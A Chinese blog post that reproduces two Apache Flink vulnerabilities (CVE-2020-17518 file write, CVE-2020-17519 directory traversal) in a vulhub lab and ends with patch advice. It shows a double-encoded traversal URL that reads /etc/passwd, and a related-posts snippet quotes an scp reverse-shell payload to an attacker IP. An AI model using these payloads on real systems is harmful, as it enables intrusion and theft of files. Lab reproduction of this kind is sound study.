CVE-2020-17518&17519 Apache Flink 文件上传&Apache Flink jobmanagerlogs 目录穿越漏洞复现

最新推荐文章于 2024-04-14 10:00:00 发布
最新推荐文章于 2024-04-14 10:00:00 发布
阅读量834 收藏
点赞数 1
分类专栏: 漏洞复现 教程 文章标签: 网络安全 安全 web安全 学习 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ierciyuan/article/details/126167588
版权

目录

一、漏洞信息

二、环境搭建

三、复现过程

四、修复建议

一、漏洞信息

漏洞名称APACHE FLINK 文件上传漏洞
漏洞编号CVE-2020-17518
危害等级高危
CVSS评分5.0
漏洞厂商Apache
受影响版本1.11.0 <= Apache Flink <= 1.11.2
漏洞概述Apache Flink 1.5.1引入了REST处理程序,攻击者可以通过恶意修改的HTTP头将上传的文件写入本地文件系统上的任意位置。
漏洞名称Apache Flink jobmanagerlogs 目录穿越漏洞
漏洞编号CVE-2020-17519
危害等级高危
CVSS评分/
漏洞厂商Apache
受影响版本1.11.0 <= Apache Flink <= 1.11.2
漏洞概述Apache Flink是美国阿帕奇软件(Apache)基金会的一款开源的分布式流数据处理引擎。该产品主要使用Java和Scala语言编写。 Apache Flink 版本 1.11.0 至 版本1.11.2 存在安全漏洞,该漏洞允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。

二、环境搭建

使用vulhub提供的镜像容器进行靶场搭建:

docker-compose up -d #启动靶场环境

访问http://your-ip:8081即可进入服务:

三、复现过程

1.测试漏洞,在攻击机kali(192.168.10.134)创建jar文件

2.上传jar文件:

3.同时开启代理抓包:

4.修改报文在/tmp路径下新建helloworld:

5.回到服务器端进入容器查看:

6.修改url构建exploit,读取服务器端用户配置文件:

192.168.10.133:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

四、修复建议

官方已提交该漏洞的修复,请用户及时将Flink升级到1.11.3或1.12.0版本。

luochen678
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Flink -任意文件写入漏洞CVE-2020-17518
chaojixiaojingang
01-07 4032
1.漏洞描述 Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入到本地文件系统上的任意位置。 2.影响版本 1.5.1-1.11.2 3.环境搭建 1)漏洞环境在docker中搭建,进入vulhub/flink/CVE-2020-17518目录 docker-compose up-d 2)访问http://192.168.210.227:80...
CVECVE-2020-17518 & CVE-2020-17519Flink 任意文件上传 & 未授权访问
边扯边淡
05-09 2505
起序:漏扫完看报告的时候发现的,复现学习一下。 一、靶场环境 使用的是 github 上的 vulhub 环境。因为 Flink 中的 CVE-2020-17518CVE-2020-17519Flink/1.11.2 版本都存在。 vulhub:https://github.com/vulhub/vulhub 1、漏洞描述:任意文件上传 & 未授权访问 CVE 编号 名称 危害 CVE-2020-17518 任意文件上传 应用系统在文件上传功能处对用户上传.
文件操作安全之-目录穿越流量告警运营分析篇
A_991128a的博客
04-14 663
目录穿越,也可以称之为路径遍历或目录遍历。通过利用输入验证不足,在输入中包含特殊字符或构造恶意的路径,绕过目录访问控制,访问目标系统上的文件或目录。由于这类问题在WEB网站的发展历史中,频繁地出现于各种业务环境中。因此在网络安全领域,逐渐形成了目录穿越这一类的漏洞,关于目录穿越漏洞的原理详见这里,如果想详细的了解目录穿越的原理,和对应的漏洞举例,可以移步到前面的文章。
文件上传漏洞原理与利用
cangyu51462的博客
05-15 1164
文件上传漏洞原理与利用
Apache Flink文件上传漏洞CVE-2020-17518漏洞复现分析
SmileAssassn的博客
01-08 522
Apache Flink文件上传漏洞CVE-2020-17518漏洞复现分析
flamelu#Vulnerability-1#CVE-2020-17518 Apache Flink 任意文件写入1
07-25
CVE-2020-17518 Apache Flink 任意文件写入影响范围。
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
Apache Flink CVE-2020-17518-id:L.pdf
最新发布
04-30
Apache Flink CVE-2020-17518--id:L.pdf
CVE-2020-17519:Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)
05-30
该脚本为Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)。 使用方法:Python CVE-2020-17519.py urls.txt urls.txt 中每个url为一行,漏洞地址输出在vul.txt中 影响版本: Apache Flink 1.11.0、1.11.1、...
[ vulhub漏洞复现篇 ] Apache Flink 文件上传漏洞 (CVE-2020-17518)
qq_51577576的博客
09-05 2183
[ vulhub漏洞复现篇 ] Apache Flink 文件上传漏洞 (CVE-2020-17518) Apache Flink是一个面向数据流处理和批量数据处理的可分布式的开源计算框架。它可以用来做批处理,即处理静态的数据集、历史的数据集;也可以用来做流处理,即实时地处理一些实时数据流,实时地产生数据的结果;也可以用来做一些基于事件的应用;该漏洞允许攻击者利用REST API,并通过精心构造的HTTP Header,实现远程文件写入。
Apache Flink(CVE-2020-17518/17519)任意文件上传和路径遍历漏洞复现
good good study
01-08 3675
目录 影响范围 docker搭建漏洞环境 漏洞复现 单个漏洞检测脚本 批量漏洞检测脚本 Apache Flink 是一个分布式流批一体化的开源平台。Flink 的核心是一个提供数据分发、通信以及自动容错的流计算引擎。Flink 在流计算之上构建批处理,并且原生的支持迭代计算,内存管理以及程序优化。式的数据分析开源系统,结合了分布式 MapReduce 类平台的高效,灵活的编程和扩展性,具有强大的流处理和批处理功能。同时在并行数据库发现查询优化方案。 2021...
Apache Fink 文件上传漏洞复现及利用
Tauil的博客
07-28 988
其它不修改,然后点击发送,因为该版本的ApacheFlink中存在有一个目录穿越漏洞,详细内容在。一个数据包,数据包中的文件,右键点击重发,然后可以看到数据包中内容。应该就是文件的名称,其创建文件的路径猜测是其默认文件路径的。boundary是分隔符,不用关注,查看到其。处进行检查或者强制规定的路径,而是使用类似。这样的直接创建文件的命令,我们可以通过修改。,我们可以使用该漏洞查看我们创建的内容。,所以猜测该网页文件地址应该是在。的效果,所以我们修改消息体内容为。查看网络数据包,然后上传任意文件。.....
CVE-2020-15778漏洞复现
热门推荐
臭nana的博客
08-04 1万+
产品:Openssh 影响的组件:SCP 漏洞版本:<= openssh-8.3p1 scp命令引发的命令注入 反弹shell的payload scp 1.txt cracer@受害机ip:'`bash -i >& /dev/tcp/攻击机ip/4444 0>&1`/tmp/test.txt' 实战测试,这里使用本机进行测试 1、查看ssh版本,符合漏洞版本 ssh -V 2、先在本地新建好文件,用于上传 2、本地开启监听 3、使用s.
[漏洞预警]Apache Flink 高危漏洞预警(CVE-2020-17518 CVE-2020-17519)
Matrix42
01-07 1831
2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞CVE-2020-17519:攻击者可通过REST API使用…/跳目录实现系统任意文件读取; CVE-2020-17518:通过构造恶意的http header,可实现远程文件写入。 1. 漏洞描述 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致目录遍历
Apache Flink任意文件写入(CVE-2020-17518)&任意文件读取(CVE-2020-17519)
qq_43244584的博客
01-26 305
Apache Flink任意文件写入(CVE-2020-17518)&任意文件读取(CVE-2020-17519) 一、简介 ​ Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。 二、漏洞概述 ​ Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入到本地文件系统上的任意位置。 三、影响版本 ​ Flink 1.5.1-1.11.2 四、环境搭建 ​ 使用vulhub进行安装 ​ Vulhub地址: ​ http
Apache Flink 通过REST API写入远程文件(CVE-2020-17518)
EC_Carrot的博客
06-04 169
漏洞背景 Apache Flink是美国阿帕奇软件(Apache)基金会的一款开源的分布式流数据处理引擎。该产品主要使用Java和Scala语言编写。 影响范围 Flink 1.5.1-1.11.2 漏洞复现 启动环境后访问http://your-ip:8081,能看到页面说明开启成功 发送以下数据包 expload: POST /jars/upload HTTP/1.1 Host: localhost:8081 Accept-Encoding: gzip, deflate Accept: */* Ac
文件上传漏洞原理和利用
VictorZhang
08-06 3482
文件上传 1.前段选择文件,提交文件 2.浏览器形成POST MultiPart报文发送到服务器 3.服务器中间件接收到报文,解析后交给后端代码进行处理 4.后端代码将上传的文件内容写入到临时文件中(PHP特有) 5.写入到文件中,文件名为提交的文件名或以一定规则生成的文件名 文件上传漏洞 1.未对上传文件进行严格的验证和过滤时,容易造成动态文件asp/php/jsp等等 2.如果上传的目标目录没...
Apache Tomcat文件包含漏洞(CVE-2020-1938)
09-11
嗨!对于Apache Tomcat文件包含漏洞(CVE-2020-1938),该漏洞是在2020年2月份公开的,影响Tomcat 9.0.0.M1至9.0.30以及8.5.0至8.5.50版本。该漏洞允许攻击者通过发送特制的请求来执行任意文件的读取和包含。 该漏洞的根本原因在于Tomcat的处理器组件(Servlet、WebSocket等)对于路径参数错误地解析了请求。攻击者可以利用这一点来读取或包含Web应用程序中的敏感文件,甚至可能在服务器上执行恶意代码。 由于该漏洞的危害性较高,建议及时升级到Tomcat 9.0.31或8.5.51版本,这些版本修复了该漏洞。此外,如果无法立即升级,你可以考虑使用防火墙或其他网络安全设备来限制对Tomcat端口的访问,从而减轻潜在攻击的风险。 记住,定期更新和维护所有软件和库是保持系统安全的重要措施之一。同时,合理配置服务器和应用程序,限制访问权限,并进行网络安全审计也是必要的。如果你是Tomcat用户,请务必关注并采取适当的措施来保护你的系统免受该漏洞的影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值